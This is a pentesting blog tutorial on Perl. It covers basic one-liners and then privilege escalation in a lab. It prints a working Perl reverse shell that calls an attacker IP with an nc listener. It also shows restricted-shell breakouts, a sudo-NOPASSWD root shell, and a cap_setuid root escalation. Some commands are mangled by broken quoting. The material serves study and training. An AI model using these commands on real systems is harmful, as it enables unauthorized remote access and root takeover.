Here we are again came back with one of very
essential command i.e. “Perl”. As we know perl has it’s significant in the era
of programming language specially designed for text editing. Apart from all of
this, now it is also vary prominent for a variety of purposes including Linux
system administration, network programming, web development, etc. So keeping
this fact into our mind we will proceed to this article that how we can take
more advantage of this command in the operation of Privilege Escalation.
NOTE: “The main objective of
publishing the series of “Linux for pentester” is to introduce the
circumstances and any kind of hurdles that can be faced by any pentester while
solving CTF challenges or OSCP labs which are based on Linux privilege
escalations. Here we do not criticize any kind of misconfiguration that a
network or system administrator does for providing higher permissions on any
programs/binaries/files & etc.”
Table of Content
Overview of Perl
·
Introduction: What is perl?
·
Where we use perl?
·
What are it’s neccesities?
·
Multiple operation using
perl.
Abusing Perl
·
SUDO Lab setups for privilege
Escalation
·
Exploiting SUDO
·
Capabilities
What is perl ?
Perl is a programming language that
stands for "Practical Extraction and Reporting Language". It was created by Larry Wall in
1987 which is specially designed for text editing purpose. As we all knows computers understand only
binary language i.e “0,1” or one can say low-level language, Which is vary
difficult for humans to program in a binary language. So to overcome that
difficulty we was needed a programming language which uses natural language
elements, words that are used in common English language that can be easily understand
by humans [high-level language].
So once a program is coded by human, it need to
be converted into the form that a computer understands. For that, we need
something which can translate the high-level language to low-level language.
Here interpreter comes to our help which is a software that converts the
program written in the high-level language to low-level language for the
computer to understand and execute the instructions written in the program.
Hence, Perl is an interpreted programming language.
It was originally a language optimized for
scanning arbitrary text files,
extracting information from those text files, and printing reports based on
that information.
Where we use perl ?
The influence of Perl can be applied in many
fields abd the most popular use of Perl is in Web development. As we know that
the major role and purpose of perl is for text editing and extracting data and
generating reports. Perl has become a popular language used in web development,
networking and bioinformatics too. Apart from all this perl can also be used
for CGI programming.
What are it’s necessities ?
As we all know there are many programming languages that can be used to do all the stuff which can be achieved by the help of
perl.
So here is the question arises that, why should
we specifically use “perl” ? Perl is very easy to learn, particularly if
you have a background in computer programming. It is extremely portable which can run on any operating system
that has Perl interpreter installed, so it is platform independent. All Linux
Operating Systems come installed with Perl, so you can start Perl coding in
Linux out of the box.
Alike other language Perl is faster and more powerful
in performing many task. It possess many shortcuts which allow the user to
write quick scripts. It was designed specifically for text processing. It
built-in text processing ability makes Perl as widely used server-side
programming language.
So on moving ahead in achieving our goal of Privilege Escalation vary first we will check for it’s
version. For this purpose we will use “-v”
option as shown below.
perl -v
To know more about all those operations that a perl can do we will
use its help command which will direct us for other functionality.
perl -h
Multiple operation of perl
Help in scripting: As we know unlike other programs that are written in languages such as
C and C++, Perl programs do not need to compile for its execution, it’s simply
interprets and executes the Perl programs. The term script often is used for
such interpreted programs written in a shell's programming language or in Perl.
For example
as per below image you can see I’ve created a file “script.pl” in which I have
stored some line of codes or can say have created a small script (one can use it in
creating any script as per requirements) that need to execute program over screen. So, to view your script use
command as bellow:
cat script.pl
perl script.pl
Help to execute code on command line: This can
be used to run a piece of Perl code without creating a file. Due to differences
between the Unix/Linux shell and the MS Windows Command prompt we need to use
different quotes around our code.
Here in below screenshot I’m running a piece of code which is
“Welcome to Ignite Technologies” by using “-e”
argument to execute the same.
perl -e
‘print qq{Welcome to Ignite Technologies\n}’
Note: In simple words one can say that this option “-e” is used to execute or
print one line of code.
Help in restricted shell environment: A user can use -e option to break out from
restricted environments by spawning an interactive system shell and it palys an
especial role in privilege escalation. By the help of this we can also run any
command in a restricted environment. Suppose in our case here I’m using this
option to run tail command for displaying last few lines of /etc/passwd file.
perl -e ‘exec “/bin/sh”; ‘
perl -e ‘exec “tail /etc/passwd’; ‘
Help to wrap the code in while loop: If we wish to wrap our code inside the loop
which depends upon certain conditions within a code which is defined by perl
then we will use “-n” option for
that case.
For example, in below image you can see that I have a file named
as “Infosec.txt” and here instead of displaying whole content I just want to
print those lines which fulfil condition.
cat
Infosec.txt
perl -n -E ‘say if /Testing/’ Infosec.txt
On framing above command perl will check to each line of file
Infosec.txt and will print all those lines which contain our search word i.e
Testing.
Help to edit file content: Perl
command also be used in editing any file content. For executing the same we
will use “-i” argument which will opens files one by one and replaces the
content with STDOUT.
As you can see in below image I’ve used this option to convert the
content of file Infosec.txt in upper case.
perl -pi
-e “tr /[a-Z]/[A-Z]/” Infosec.txt
head -7
Infosec.txt
The most common use of “-p” together with the “-i” option
also helps to provide "in-place editing". Which means that instead of
printing to the screen, all the output spawned by our one-liner will be written
back to the same file from where it was taken. Here we are using this to
replace a word with other word.
perl -i -p
-E ‘s/IGNITE/Egnite/’ Infosec.txt
head -7
Infosec.txt
On framing above command you perl will replace the word “IGNITE”
with “Egnite” of file Infosec.txt
Perl in reverse shell: We all knows that reverse shell is a
type of shell in which the target machine interconnects to the attacking
machine and the attacking machine has a listener port on which it receives the
connection.
So, here we are using perl command which will send back a reverse
shell to a listening attacker that will open a remote network access.
perl -e
'use
Socket;$i="192.168.29.157";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash
-i");};'
On framing above command run nc -lvp 1234 on the
attacker box to receive the shell.
nc -lvp
1234
id
whoami
Abusing perl
Sudo Rights Lab setups
for Privilege Escalation
In above all, we have covered the main objectives that a perl can
perform but now we will move ahead in the task of privilege escalation. So to
grab this first, we have to set up our lab of perl command with administrative
rights. After that we will check for the perl command that what impression it
has after getting sudo rights and how we can use it more for privilege
escalation.
From the below image It can be clearly understood I have created a
local user (demo) who own all sudo rights as root and can achieve all task as
admin.
To add sudo right open etc/sudoers file and type following as user
Privilege specification.
demo All=(ALL)
NOPASSWD: /usr/bin/perl
Exploiting Sudo rights
On adding user “demo” to etc/sudoers file, now we will start
exploiting perl facility by taking the privilege of sudoer’s permission. For
this very first we must have sessions of victim’s machine then only we can
execute this task. Suppose we got the sessions of victim’s machine that will
assist us to have local user access of the targeted system through which we can
escalate the root user rights.
So now we will connect to the target machine with ssh, therefore,
type following command to get access through local user login.
Then we look for sudo right of “demo” user (if given) and found
that user “demo” can execute the perl command as “root” without a password.
whoami
sudo -l
sudo perl
-e “/bin/bash”; ‘
whoami
Capabilities in Privilege Escalation
As we know that whenever any sticky bit is set to any file then
every privileged and unprivileged user can easily access those files but if for
security purpose if we want to share or get access those only with
limited/single user then we can simply use capabilities for acquiring this
operation.
The capability-based security states to the principle of manipulative
user programs such that they directly share capabilities with each other
according to the principle of least privilege to make transactions efficient
and secure. For this task we simply copy the file to the /home of selected user
to get it securely accessible.
As above stated where I’ve added user “demo” to /etc/sodoers and
knows that user “demo” can execute the perl command as “root” without a
password but I also except this user no one can access this file so I will set
capabilities for this user as shown below.
which perl
cp $(which
perl) /home/demo
setcap
cap_setuid+ep /home/demo/perl
From below image it has been cleared that user “demo” can easily
execute “perl” as root and hence we have successfully accomplished our mission
of privilege escalation using perl.
./perl -e
'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
id
Conclusion: The main
influence of this article is to use “perl” command for privilege escalation
that’s why we have just covered the basic operation that can be achieved by the
use of this command.
0 comments:
Post a Comment